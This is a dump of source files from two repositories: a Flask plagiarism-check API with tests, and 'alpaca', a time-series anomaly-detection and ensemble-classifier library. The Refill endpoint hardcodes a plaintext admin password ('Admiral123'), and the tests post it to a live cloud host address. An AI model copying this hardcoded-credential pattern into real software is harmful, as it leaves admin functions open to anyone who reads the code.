tiwarim/PlagiarismCheck
refs/heads/master
# importing libraries from sys_utils import * # Resource refill """ Resource Refill takes input on a POST protocol and adds to the existing tokens     Parameters:      namepassref: contains username, admin password and refill amount <JSON>     Returns:         retJson: contains status code and message <JSON> """ class Refill(Resource): def post(self): namepassref = request.get_json() username = namepassref["username"] admin_password = namepassref["admin_password"] refill_amt = namepassref["refill_amt"] if not userExists(username): retJson = { "statuscode" : 301, "message" : "User does not exit" } return jsonify(retJson) correct_admin_password = "Admiral123" if not correct_admin_password == admin_password: retJson = { "statuscode" : 304, "message" : "Invalid admin password" } return jsonify(retJson) num_tokens = countTokens(username) users.update({ "username":username, }, { "$set": { "tokens" : num_tokens + refill_amt } } ) retJson = { "statuscode" : 200, "message" : "Tokens refilled successfully" } return jsonify(retJson)
Python
51
26.647058
83
/src/Backend/web/Refill.py
0.534752
0.528369
tiwarim/PlagiarismCheck
refs/heads/master
# importing libraries from sys_utils import * # Resource Register """ Resource Register takes input on a POST protocol and creates new accounts     Parameters:      namepass: contains username and password of the user <JSON>     Returns:         retJson: contains status code and message <JSON> """ class Register(Resource): def post(self): namepass = request.get_json() username = namepass["username"] password = namepass["password"] # check if the user already exists if userExists(username): retJson = { "statuscode" : 301, "message" : "User Already exists" } return jsonify(retJson) hashedpw = bcrypt.hashpw(password.encode('utf8'), bcrypt.gensalt()) users.insert({ "username" : username, "password" : hashedpw, "tokens" : 6 }) retJson = { "statuscode" : 200, "message" : "you successfuly signed up for the api" } return jsonify(retJson)
Python
36
28.916666
78
/src/Backend/web/Register.py
0.566388
0.55896
tiwarim/PlagiarismCheck
refs/heads/master
import requests import json from time import process_time def test_FR1_1(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/register', json={ "username" : "ghtdsss", "password" : "12356" }) json_response = response.json() assert json_response['statuscode'] == 200 def test_FR1_2(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/register', json={ "username" : "fffff", "password" : "123" }) json_response = response.json() assert json_response['statuscode'] == 200 def test_FR1_3(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/register', json={ "username" : "&%$!@&", "password" : "123" }) json_response = response.json() assert json_response['statuscode'] == 200 def test_FR2_1(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/register', json={ "username" : "fffff", "password" : "123" }) json_response = response.json() assert json_response['statuscode'] == 301 def test_FR2_2(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/register', json={ "username" : "fffff", "password" : "123" }) json_response = response.json() assert json_response['statuscode'] == 200 def test_FR3_1(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "wer", "password" : "123", "text1" : "www", "text2" : "www" }) json_response = response.json() assert json_response['statuscode'] == 200 assert json_response["similarity ratio"] == 100 def test_FR3_2(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "gggg", "password" : "123", "text1" : "www", "text2" : "www" }) json_response = response.json() assert json_response['statuscode'] == 200 assert json_response["similarity ratio"] == 100 def test_FR3_3(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "fffff", "password" : "123", "text1" : "www", "text2" : "www" }) json_response = response.json() assert json_response['statuscode'] == 303 def test_FR3_4(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "wer", "password" : "1234", "text1" : "www", "text2" : "www" }) json_response = response.json() assert json_response['statuscode'] == 302 def test_FR4_1(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/refill', json={ "username" : "wsx", "admin_password" : "Admiral123", "refill_amt" : 10 }) json_response = response.json() assert json_response['statuscode'] == 200 assert json_response["tokens left"] == 226 def test_FR4_2(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/refill', json={ "username" : "weesx", "admin_password" : "Admiral123", "refill_amt" : 10 }) json_response = response.json() assert json_response['statuscode'] == 301 def test_FR4_3(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/refill', json={ "username" : "wsx", "admin_password" : "Admiral12345", "refill_amt" : 10 }) json_response = response.json() assert json_response['statuscode'] == 304 def test_FR4_4(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/refill', json={ "username" : "wsx", "admin_password" : "Admiral123", "refill_amt" : 10 }) json_response = response.json() assert json_response['statuscode'] == 200 assert json_response["tokens left"] == 20 def test_NFR2_1(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/register', json={ "username" : "wssdxwda", "password" : "123" }) json_response = response.json() assert json_response['statuscode'] == 200 def test_NFR2_2(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "wer", "password" : "123", "text1" : "w", "text2" : "w" }) json_response = response.json() assert json_response['statuscode'] == 200 assert json_response["similarity ratio"] == 100 def test_NFR2_3(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/refill', json={ "username" : "123", "admin_password" : "Admiral123", "refill_amt" : 5 }) json_response = response.json() assert json_response['statuscode'] == 200 assert json_response["tokens left"] == 31 def test_NFR3_1(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "wer", "password" : "123", "text1" : "我是谁", "text2" : "我是谁" }) json_response = response.json() assert json_response['statuscode'] == 200 assert json_response["similarity ratio"] == 100 def test_NFR3_2(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "wer", "password" : "123", "text1" : "😀", "text2" : "😀" }) json_response = response.json() assert json_response['statuscode'] == 200 assert json_response["similarity ratio"] == 100 def test_NFR4_1(): t1_start = process_time() response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "wer", "password" : "123", "text1" : "www", "text2" : "www" }) json_response = response.json() t1_stop = process_time() Elapsed_time = t1_stop - t1_start assert Elapsed_time <= 0.1 def test_NFR4_2(): t1_start = process_time() response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "wer", "password" : "123", "text1" : "微服私访被u饿不饿不吃速测", "text2" : "金额发i俄服务i脑残粉i为访问" }) json_response = response.json() t1_stop = process_time() Elapsed_time = t1_stop - t1_start assert Elapsed_time <= 0.1
Python
205
30.790243
109
/src/Testing/Unit_Test.py
0.616754
0.537435
sebastianden/alpaca
refs/heads/master
from alpaca import Alpaca from utils import to_time_series_dataset, to_dataset, split_df, TimeSeriesResampler import time import numpy as np import pandas as pd from sklearn.pipeline import Pipeline max_sample = 20 for dataset in ['uc2']: if dataset == 'uc1': X, y = split_df(pd.read_pickle('..\\data\\df_uc1.pkl'), index_column='run_id', feature_columns=['fldPosition', 'fldCurrent'], target_name='target') y = np.array(y) # Length of timeseries for resampler and cnn sz = 38 # Number of channels for cnn num_channels = len(X[0][0]) # Number of classes for cnn num_classes = np.unique(y).shape[0] if dataset == 'uc2': X, y = split_df(pd.read_pickle('..\\data\\df_uc2.pkl'), index_column='run_id', feature_columns=['position', 'force'], target_name='label') y = np.array(y) # Length of timeseries for resampler and cnn sz = 200 # Number of channels for cnn num_channels = len(X[0][0]) # Number of classes for cnn num_classes = np.unique(y).shape[0] resampler = TimeSeriesResampler(sz=sz) alpaca = Pipeline([('resampler', resampler), ('classifier', Alpaca())]) alpaca.fit(X, y, classifier__stacked=False, classifier__n_clusters=200) # Measure time for single sample processing t = [] for i in range(1, max_sample+1): for j in range(10): rand = np.random.randint(2000) sample = np.transpose(to_time_series_dataset(X[rand]), (2, 0, 1)) start = time.process_time() for k in range(100): for l in range(i): y_pred_bin, y_pred = alpaca.predict(sample, voting='veto') end = time.process_time() t.append([i, (end-start)/100, 'single']) # Measure time for batch processing of multiple sample numbers for i in range(1, max_sample+1): for j in range(10): rand = np.random.randint(2000) if i == 1: sample = np.transpose(to_time_series_dataset(X[rand]), (2, 0, 1)) else: sample = to_dataset(X[rand:rand+i]) start = time.process_time() for k in range(100): y_pred_bin, y_pred = alpaca.predict(sample, voting='veto') end = time.process_time() t.append([i, (end-start)/100, 'batch']) df = pd.DataFrame(t, columns=['Sample Number', 'Time', 'Type']) df.to_csv("..\\results\\Time_"+dataset+".csv")
Python
70
37.357143
84
/src/test_time.py
0.540721
0.519896
sebastianden/alpaca
refs/heads/master
from alpaca import Alpaca from utils import to_time_series_dataset, split_df, TimeSeriesResampler, confusion_matrix from sklearn.model_selection import train_test_split from sklearn.utils import shuffle from sklearn.pipeline import Pipeline import time import numpy as np import pandas as pd # Variables repetitions = 2 if __name__ == "__main__": # For both datasets for dataset in ['uc1']: print("Dataset: ", dataset) results = [] #timing = [] #outliers = [] if dataset == 'uc1': X, y = split_df(pd.read_pickle('..\\data\\df_uc1.pkl'), index_column='run_id', feature_columns=['fldPosition', 'fldCurrent'], target_name='target') # Length of timeseries for resampler and cnn sz = [38,41] # Number of channels for cnn num_channels = len(X[0][0]) # Number of classes for cnn num_classes = np.unique(y).shape[0] elif dataset == 'uc2': X, y = split_df(pd.read_pickle('..\\data\\df_uc2.pkl'), index_column='run_id', feature_columns=['position', 'force'], target_name='label') # Length of timeseries for resampler and cnn sz = [200] # Number of channels for cnn num_channels = len(X[0][0]) # Number of classes for cnn num_classes = np.unique(y).shape[0] # For each repetition for r in range(repetitions): print("Repetition #", r) # For each resampling length for s in sz: print("Resampling size:", s) t_start = time.time() # Shuffle for Keras X, y = shuffle(X, y, random_state=r) # Turn y to numpy array y = np.array(y) # Split into train and test sets X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, stratify=y, random_state=r) alpaca = Pipeline([('resampler', TimeSeriesResampler(sz=s)), ('classifier', Alpaca())]) alpaca.fit(X_train, y_train, classifier__stacked=False, classifier__n_clusters=200) # Prediction y_pred_bin, y_pred = alpaca.predict(X_test, voting="veto") y_test_bin = np.copy(y_test) y_test_bin[y_test_bin > 0] = 1 # BINARY RESULTS (AD + ENSEMBLE) tn, fp, fn, tp = confusion_matrix(y_test_bin, y_pred_bin).ravel() # Append overall error results.append([s, r, 'err_bin', (fp + fn) / (tn + fp + fn + tp)]) # Append false negative rate results.append([s, r, 'fnr_bin', fn / (fn + tp)]) # Append false positive rate results.append([s, r, 'fpr_bin', fp / (fp + tn)]) # CLASSIFIER RESULTS y_pred_clf = np.copy(y_pred) y_pred_clf[y_pred_clf != 0] = 1 # Also turn classifier predictions to binary for cfm tn, fp, fn, tp = confusion_matrix(y_test_bin, y_pred_clf).ravel() # Append overall error results.append([s, r, 'err_ens', (fp + fn) / (tn + fp + fn + tp)]) # Append false negative rate results.append([s, r, 'fnr_ens', fn / (fn + tp)]) # Append false positive rate results.append([s, r, 'fpr_ens', fp / (fp + tn)]) """ # TIMING sample = np.transpose(to_time_series_dataset(X_test[0]), (2, 0, 1)) start = time.time() for i in range(100): alpaca.predict(sample, voting='veto') end = time.time() timing.append([(end - start) * 10, s]) # in ms # SAVE OUTLIERS (with y_pred,y_pred_bin, y_true) idx = np.where(y_test_bin != y_pred_bin) # Flattened curves for i in idx[0]: outliers.append([X_test[i], y_pred[i], y_test[i], y_pred_bin[i], y_test_bin[i]]) """ t_end = time.time() print("Substest finished, duration ",(t_end-t_start)) # SAVE ALL RESULTS PER DATASET df = pd.DataFrame(results, columns=['resampling', 'test', 'metric', 'value']) df.to_csv("..\\results\\Test"+dataset+".csv") #df = pd.DataFrame(timing, columns=['time', 'resampling']) #df.to_csv("..\\results\\Timing"+dataset+".csv") #df = pd.DataFrame(outliers, columns=['sample', 'y_pred', 'y_test', 'y_pred_bin', 'y_test_bin']) #df.to_pickle("..\\results\\Outliers"+dataset+".pkl") #plot_confusion_matrix(y_test_bin.astype(int), y_pred_bin.astype(int), np.array(["0", "1"]), cmap=plt.cm.Blues) #plt.show() #plot_confusion_matrix(y_test.astype(int), y_pred.astype(int), np.array(["0", "1", "2", "3", "?"]), cmap=plt.cm.Greens) #plt.show()
Python
124
41.919353
123
/src/test_use_case.py
0.484695
0.476432
sebastianden/alpaca
refs/heads/master
import numpy as np import pandas as pd from utils import split_df, TimeSeriesResampler, plot_confusion_matrix, Differentiator from alpaca import Alpaca from sklearn.model_selection import train_test_split from sklearn.pipeline import Pipeline import matplotlib.pyplot as plt if __name__ == "__main__": """ IMPORT YOUR DATA HERE X, y = DEFINE RESAMPLING LENGTH IF NEEDED sz = """ # Turn y to numpy array y = np.array(y) # Split into train and test sets X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, stratify=y, random_state=42) # Pipeline example alpaca = Pipeline([('resampler', TimeSeriesResampler(sz=sz)),('alpaca', Alpaca())]) alpaca.fit(X_train, y_train) """ # Example with additional channel derived from channel 0 alpaca = Pipeline([('resampler', TimeSeriesResampler(sz=sz)), ('differentiator',Differentiator(channel=0)), ('alpaca', Alpaca())]) """ y_pred_bin_veto, y_pred_veto = alpaca.predict(X_test, voting="veto") y_pred_bin_dem, y_pred_dem = alpaca.predict(X_test, voting="democratic") y_pred_bin_meta_dtc, y_pred_meta_dtc = alpaca.predict(X_test, voting="meta_dtc") y_pred_bin_meta_svc, y_pred_meta_svc = alpaca.predict(X_test, voting="meta_svc") # Store all results in a dataframe y_pred_indiv = np.column_stack((y_pred_bin_veto, y_pred_veto,y_pred_bin_dem, y_pred_dem, y_pred_bin_meta_dtc, y_pred_meta_dtc, y_pred_bin_meta_svc, y_pred_meta_svc, y_test)).astype(int) df_results = pd.DataFrame(y_pred_indiv, columns = ['y_pred_bin_veto', 'y_pred_veto','y_pred_bin_dem', 'y_pred_dem', 'y_pred_bin_meta_dtc','y_pred_meta_dtc', 'y_pred_bin_meta_svc', 'y_pred_meta_svc', 'y_true']) df_results.to_csv("results\\y_pred_total.csv",index=False) print("TEST FINISHED SUCCESSFULLY")
Python
46
43.152172
113
/src/main.py
0.607776
0.604823
sebastianden/alpaca
refs/heads/master
import warnings warnings.simplefilter(action='ignore') import pickle import pandas as pd import numpy as np from utils import TimeSeriesScalerMeanVariance, Flattener, Featuriser, plot_dtc from sklearn.pipeline import Pipeline from sklearn.model_selection import StratifiedKFold from sklearn.model_selection import GridSearchCV from sklearn.metrics import roc_curve, auc from sklearn.tree import DecisionTreeClassifier from sklearn.svm import SVC from sklearn.base import ClassifierMixin, BaseEstimator, clone from tslearn.clustering import TimeSeriesKMeans from tslearn.neighbors import KNeighborsTimeSeriesClassifier from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Conv1D, Dense, MaxPooling1D, Flatten from tensorflow.keras.wrappers.scikit_learn import KerasClassifier from IPython.display import SVG from tensorflow.keras.utils import model_to_dot from tensorflow.keras.utils import plot_model class Alpaca(ClassifierMixin): """ A learning product classification algorithm. """ def __init__(self): self.anomaly_detection = AnomalyDetection() self.classifier = Classifier() def fit(self, X, y, stacked=True): """ Fit the algorithm according to the given training data. Parameters ---------- X : array-like of shape (n_samples, n_features, n_channels) Training samples. y : array-like of shape (n_samples,) True labels for X. stacked: bool If true train a meta classifier on kfold CV predictions of the level 1 classifiers Returns ------- self: object Fitted model """ # Fit anomaly detection # Do GridSearch to get best model param_grid = {'n_clusters': [10,50,100,200]} grid = GridSearchCV(self.anomaly_detection, param_grid, cv=5, refit=True, verbose=2, n_jobs=-1) grid.fit(X, y) # Save results df_results = pd.DataFrame.from_dict(data=grid.cv_results_) df_results.to_csv("results\\ad.csv",index=False) print(grid.best_params_) # Take best model self.anomaly_detection = grid.best_estimator_ # Save the model with open("models\\ad.pkl", 'wb') as file: pickle.dump(self.anomaly_detection, file) # Fit ensemble classifier self.classifier.fit(X, y, stacked) return self def predict(self, X, voting): """ Perform a classification on samples in X. Parameters ---------- X : array-like of shape (n_samples, n_features, n_channels) Test samples. voting: string Voting scheme to use Returns ------- y_pred: array, shape (n_samples,) Predictions from ensemble with suggested class labels y_pred_bin: array, shape (n_samples,) Combined binary predictions """ # Class predictions of ensemble y_pred, y_pred_ens = self.classifier.predict(X, voting=voting) # Binary predictions of anomaly detector y_pred_ad = self.anomaly_detection.predict(X) # Save individual predictions y_pred_indiv = np.column_stack((y_pred_ens, y_pred_ad)).astype(int) df_results = pd.DataFrame(y_pred_indiv, columns = ['y_pred_dtc','y_pred_svc','y_pred_cnn','y_pred_ad']) df_results.to_csv("results\\y_pred_indiv.csv",index=False) # Overwrite the entries in y_pred_knn with positive, where ensemble decides positive y_pred_bin = np.where(y_pred != 0, 1, y_pred_ad) return y_pred_bin, y_pred class AnomalyDetection(ClassifierMixin, BaseEstimator): """ Anomaly detection with 1-NN and automatic calculation of optimal threshold. """ def __init__(self, n_clusters=200): self.knn = KNeighborsTimeSeriesClassifier(n_neighbors=1, weights='uniform', metric='euclidean', n_jobs=-1) self.d = None self.n_clusters = n_clusters def fit(self, X, y): """ Fit the algorithm according to the given training data. Parameters ---------- X : array-like of shape (n_samples, n_features, n_channels) Training samples. y : array-like of shape (n_samples,) True labels for X. Returns ------- self: object Fitted model """ # Fit anomaly detection knn over k-means centroids X_good = X[np.where(y == 0)] X_bad = X[np.where(y != 0)] km = TimeSeriesKMeans(n_clusters=self.n_clusters, metric="euclidean", max_iter=100, random_state=0, n_jobs=-1).fit(X_good) self.knn.fit(km.cluster_centers_, np.zeros((self.n_clusters,))) # Calculate distances to all samples in good and bad d_bad, _ = self.knn.kneighbors(X_bad) d_good, _ = self.knn.kneighbors(X_good) # Calculate ROC y_true = np.hstack((np.zeros(X_good.shape[0]), np.ones(X_bad.shape[0]))) y_score = np.vstack((d_good, d_bad)) fpr, tpr, thresholds = roc_curve(y_true, y_score, pos_label=1) # Determine d by Youden index self.d = thresholds[np.argmax(tpr - fpr)] return self def predict(self, X): """ Perform a classification on samples in X. Parameters ---------- X : array-like of shape (n_samples, n_features, n_channels) Test samples. Returns ------- y_pred: array, shape (n_samples,) Predictions """ # Binary predictions of anomaly detector y_pred = np.squeeze(np.where(self.knn.kneighbors(X)[0] < self.d, 0, 1)) return y_pred class Classifier(ClassifierMixin): """ Classifier part with ensemble of estimators. """ def __init__(self): # DTC pipeline featuriser = Featuriser() dtc = DecisionTreeClassifier() self.dtc_pipe = Pipeline([('featuriser', featuriser), ('dtc', dtc)]) # SVC pipeline scaler = TimeSeriesScalerMeanVariance(kind='constant') flattener = Flattener() svc = SVC() self.svc_pipe = Pipeline([('scaler', scaler), ('flattener', flattener), ('svc', svc)]) # Keras pipeline #len_filter = round(len_input*0.05) #num_filter = 8 cnn = KerasClassifier(build_fn=build_cnn, epochs=100, verbose=0) self.cnn_pipe = Pipeline([('scaler', scaler), ('cnn', cnn)]) # Meta classifier self.meta_dtc = DecisionTreeClassifier() self.meta_svc = SVC() def fit(self, X, y, stacked): """ Fit each individual estimator of the ensemble model according to the given training data. Parameters ---------- X : array-like of shape (n_samples, n_features, n_channels) Training samples. y : array-like of shape (n_samples,) True labels for X. stacked: bool If true train a meta classifier on kfold CV predictions of the level 1 classifiers Returns ------- self: object Fitted model """ # Fit DTC # Do GridSearch to get best model param_grid = {'featuriser__windows': [1, 2, 3, 4, 5, 6], 'dtc__max_depth': [3, 4, 5], 'dtc__criterion': ['gini', 'entropy']} grid = GridSearchCV(self.dtc_pipe, param_grid, cv=5, refit=True, verbose=2, n_jobs=-1) grid.fit(X, y) # Save results df_results = pd.DataFrame.from_dict(data=grid.cv_results_) df_results.to_csv("results\\dtc.csv",index=False) print(grid.best_params_) # Take best model self.dtc_pipe = grid.best_estimator_ # Plot the dtc #plot_dtc(self.dtc_pipe['dtc']) # Save the model with open("models\\dtc_pipe.pkl", 'wb') as file: pickle.dump(self.dtc_pipe, file) # Fit SVC # Do GridSearch to get best model param_grid = {'svc__C': [10, 100, 1000, 10000], 'svc__gamma': [0.01, 0.001, 0.0001, 0.00001], 'svc__degree': [2, 3], 'svc__kernel': ['rbf', 'linear', 'poly']} grid = GridSearchCV(self.svc_pipe, param_grid, cv=5, refit=True, verbose=2, n_jobs=-1) grid.fit(X, y) # Save results df_results = pd.DataFrame.from_dict(data=grid.cv_results_) df_results.to_csv("results\\svc.csv",index=False) print(grid.best_params_) # Take best model self.svc_pipe = grid.best_estimator_ # Save the model with open("models\\svc_pipe.pkl", 'wb') as file: pickle.dump(self.dtc_pipe, file) # Fit CNN # Do GridSearch to get best model param_grid = {'cnn__num_channels':[X.shape[2]], 'cnn__len_input':[X.shape[1]], 'cnn__num_classes':[np.unique(y).shape[0]], 'cnn__batch_size': [20, 30], 'cnn__num_filter': [4, 8, 16], 'cnn__num_layer': [1, 2], 'cnn__len_filter': [0.05, 0.1, 0.2]} # len_filter is defined as fraction of input_len grid = GridSearchCV(self.cnn_pipe, param_grid, cv=5, refit=True, verbose=2, n_jobs=-1) grid.fit(X, y) # Save results df_results = pd.DataFrame.from_dict(data=grid.cv_results_) df_results.to_csv("results\\cnn.csv",index=False) print(grid.best_params_) # Take best model self.cnn_pipe = grid.best_estimator_ # Save the model self.cnn_pipe['cnn'].model.save("models\\cnn.h5") # Fit the Metaclassifiers if stacked: # Get level 1 classifier predictions as training data X_stacked, y_stacked = kfoldcrossval(self, X, y, k=5) # Fit Meta DTC self.meta_dtc.fit(X_stacked, y_stacked) # Save the model with open("models\\meta_dtc.pkl", 'wb') as file: pickle.dump(self.meta_dtc, file) # Fit Meta SVC self.meta_svc.fit(X_stacked, y_stacked) # Save the model with open("models\\meta_svc.pkl", 'wb') as file: pickle.dump(self.meta_svc, file) return self def predict(self, X, voting='veto'): """ Perform a classification on samples in X. Parameters ---------- X : array-like of shape (n_samples, n_features, n_channels) Test samples. voting: string Voting scheme to use Returns ------- y_pred: array, shape (n_samples,) Predictions y_pred_ens: array, shape (n_samples, 3) Predictions of the individual estimators """ y_pred = np.empty(np.shape(X)[0]) # Parallelize this part y_dtc = self.dtc_pipe.predict(X) y_svc = self.svc_pipe.predict(X) y_cnn = self.cnn_pipe.predict(X) y_pred_ens = np.stack([y_dtc, y_svc, y_cnn], axis=1).astype(int) if voting == 'veto': for i in range(np.shape(X)[0]): if y_dtc[i] == y_svc[i] == y_cnn[i]: y_pred[i] = y_dtc[i] else: y_pred[i] = -1 if voting == 'democratic': for i in range(np.shape(X)[0]): y_pred[i] = np.argmax(np.bincount(y_pred_ens[i, :])) if voting == 'meta_dtc': y_pred = self.meta_dtc.predict(y_pred_ens) if voting == 'meta_svc': y_pred = self.meta_svc.predict(y_pred_ens) return y_pred, y_pred_ens def kfoldcrossval(model, X, y, k=5): """ Performs another cross-validation with the optimal models in order to get the level 1 predictions to train the meta classifier. Parameters ---------- model: object Ensemble classifier object X : array-like of shape (n_samples, n_features, n_channels) Samples. y : array-like of shape (n_samples,) True labels for X. k: int Number of splits Returns ------- X_stack: array-like of shape (n_samples, n_features) Level 1 predictions as training data for metaclassifier y_stack: array-like of shape (n_samples,) Targets for metaclassifier """ kfold = StratifiedKFold(n_splits=k, shuffle=True, random_state=42) X_stack = np.empty((0, 3)) y_stack = np.empty((0,)) # Make a copy of the already fitted classifiers (to not overwrite the originals) dtc_temp = clone(model.dtc_pipe) svc_temp = clone(model.svc_pipe) cnn_temp = clone(model.cnn_pipe) # Train classifiers agin in kfold crossvalidation to get level 1 predictions for train, test in kfold.split(X, y): # Train all models on train dtc_temp.fit(X[train], y[train]) svc_temp.fit(X[train], y[train]) cnn_temp.fit(X[train], y[train]) # Test all on test y0 = dtc_temp.predict(X[test]) y1 = svc_temp.predict(X[test]) y2 = cnn_temp.predict(X[test]) # Concatenate predictions of individual classifier a = np.stack((y0, y1, y2), axis=-1).astype(int) # Concatenate with predictions from other splits X_stack = np.vstack((X_stack, a)) y_stack = np.hstack((y_stack, y[test])) return X_stack, y_stack def build_cnn(num_filter, len_filter, num_layer, num_channels, len_input, num_classes): """ Function returning a keras model. Parameters ---------- num_filter: int Number of filters / kernels in the conv layer len_filter: float Length of the filters / kernels in the conv layer as fraction of inputlength num_layer: int Number of convlutional layers in the model num_channels: int Number of channels of the input len_input: int Number of dimensions of the input num_classes: int Number of classes in the dataset = Number of outputs Returns ------- model: sequential keras model Keras CNN model ready to be trained """ model = Sequential() # First Conv Layer model.add(Conv1D(filters=num_filter, kernel_size=int(len_filter*len_input), strides=1, padding="same", activation='relu', input_shape=(len_input, num_channels), name='block1_conv1')) model.add(MaxPooling1D(pool_size=2, strides=2, padding="same", name='block1_pool')) # Other Conv Layers for l in range(2, num_layer + 1): model.add(Conv1D(filters=num_filter*l, kernel_size=int(len_filter * len_input), strides=1, padding="same", activation='relu', name='block' + str(l) + '_conv1')) model.add(MaxPooling1D(pool_size=2, strides=2, padding="same", name='block' + str(l) + '_pool')) model.add(Flatten(name='flatten')) model.add(Dense(100, activation='relu', name='fc1')) model.add(Dense(num_classes, activation='softmax',name='predictions')) model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy']) plot_model(model,dpi = 300, show_shapes=True, to_file='models\\cnn.png') return model
Python
411
36.114357
114
/src/alpaca.py
0.585945
0.575062
sebastianden/alpaca
refs/heads/master
import matplotlib.pyplot as plt from sklearn.metrics import confusion_matrix from sklearn.utils.multiclass import unique_labels from scipy.stats import kurtosis, skew import numpy as np import pandas as pd from sklearn.base import TransformerMixin, BaseEstimator from sklearn import tree import graphviz # Load the testbench data def load_test(): df = pd.read_pickle('data\\df_test.pkl') pivoted = df.pivot(index='sample_nr',columns='idx') X = np.stack([pivoted['position'].values, pivoted['velocity'].values, pivoted['current'].values], axis=2) y = df.groupby('sample_nr').target.first().values return X, y # Load any dataset (WARNING: predefined length!) def load_data(dataset): if dataset == 'test': X, y = load_test() sz = 230 elif dataset == 'uc1': X, y = split_df(pd.read_pickle('data\\df_uc1.pkl'), index_column='run_id', feature_columns=['fldPosition', 'fldCurrent'], target_name='target') # Length of timeseries for resampler and cnn sz = 38 elif dataset == 'uc2': X, y = split_df(pd.read_pickle('data\\df_uc2.pkl'), index_column='run_id', feature_columns=['position', 'force'], target_name='label') # Length of timeseries for resampler and cnn sz = 200 resampler = TimeSeriesResampler(sz=sz) X = resampler.fit_transform(X, y) y = np.array(y) return X, y # Load and split UC1 and UC2 datasets def split_df(df,index_column, feature_columns, target_name): labels = [] features = [] for id_, group in df.groupby(index_column): features.append(group[feature_columns].values.tolist()) labels.append(group[target_name].iloc[0]) return features, labels # Function to plot confusion matrix def plot_confusion_matrix(y_true, y_pred, classes, normalize=False, title=None, cmap=plt.cm.Blues): """ This function prints and plots the confusion matrix. Normalization can be applied by setting `normalize=True`. """ if not title: if normalize: title = 'Normalized confusion matrix' else: title = 'Confusion matrix, without normalization' # Compute confusion matrix cm = confusion_matrix(y_true, y_pred) # Only use the labels that appear in the data classes = classes[unique_labels(y_true, y_pred)] """ if normalize: cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis] print("Normalized confusion matrix") else: print('Confusion matrix, without normalization') print(cm) """ fig, ax = plt.subplots() im = ax.imshow(cm, interpolation='nearest', cmap=cmap) #ax.figure.colorbar(im, ax=ax) # We want to show all ticks... ax.set(xticks=np.arange(cm.shape[1]), yticks=np.arange(cm.shape[0]), # ... and label them with the respective list entries xticklabels=classes, yticklabels=classes, ylabel='True label', xlabel='Predicted label') # Matplotlib 3.1.1 bug workaround ax.set_ylim(len(cm)-0.5, -0.5) # Rotate the tick labels and set their alignment. plt.setp(ax.get_xticklabels(), rotation=45, ha="right", rotation_mode="anchor") # Loop over data dimensions and create text annotations. fmt = '.2f' if normalize else 'd' thresh = cm.max() / 2. for i in range(cm.shape[0]): for j in range(cm.shape[1]): ax.text(j, i, format(cm[i, j], fmt), ha="center", va="center", color="white" if cm[i, j] > thresh else "black") fig.tight_layout() return ax def to_time_series_dataset(dataset): """Transforms a time series dataset so that it has the following format: (no_time_series, no_time_samples, no_features) Parameters ---------- dataset : array-like The dataset of time series to be transformed. Returns ------- numpy.ndarray of shape (no_time_series, no_time_samples, no_features) """ assert len(dataset) != 0, 'dataset is empty' try: np.array(dataset, dtype=np.float) except ValueError: raise AssertionError('All elements must have the same length.') if np.array(dataset[0]).ndim == 0: dataset = [dataset] if np.array(dataset[0]).ndim == 1: no_time_samples = len(dataset[0]) no_features = 1 else: no_time_samples, no_features = np.array(dataset[0]).shape return np.array(dataset, dtype=np.float).reshape( len(dataset), no_time_samples, no_features) def to_dataset(dataset): """Transforms a time series dataset so that it has the following format: (no_time_series, no_time_samples, no_features) where no_time_samples for different time sereies can be different. Parameters ---------- dataset : array-like The dataset of time series to be transformed. Returns ------- list of np.arrays (no_time_series, no_time_samples, no_features) """ assert len(dataset) != 0, 'dataset is empty' if np.array(dataset[0]).ndim == 0: dataset = [[d] for d in dataset] if np.array(dataset[0]).ndim == 1: no_features = 1 dataset = [[[d] for d in data] for data in dataset] else: no_features = len(dataset[0][0]) for data in dataset: try: array = np.array(data, dtype=float) except ValueError: raise AssertionError( "All samples must have the same number of features!") assert array.shape[-1] == no_features,\ 'All series must have the same no features!' return dataset class TimeSeriesResampler(TransformerMixin): """Resampler for time series. Resample time series so that they reach the target size. Parameters ---------- no_output_samples : int Size of the output time series. """ def __init__(self, sz): self._sz = sz def fit(self, X, y=None, **kwargs): return self def _interp(self, x): return np.interp( np.linspace(0, 1, self._sz), np.linspace(0, 1, len(x)), x) def transform(self, X, **kwargs): X_ = to_dataset(X) res = [np.apply_along_axis(self._interp, 0, x) for x in X_] return to_time_series_dataset(res) class TimeSeriesScalerMeanVariance(TransformerMixin): """Scaler for time series. Scales time series so that their mean (resp. standard deviation) in each dimension. The mean and std can either be constant (one value per feature over all times) or time varying (one value per time step per feature). Parameters ---------- kind: str 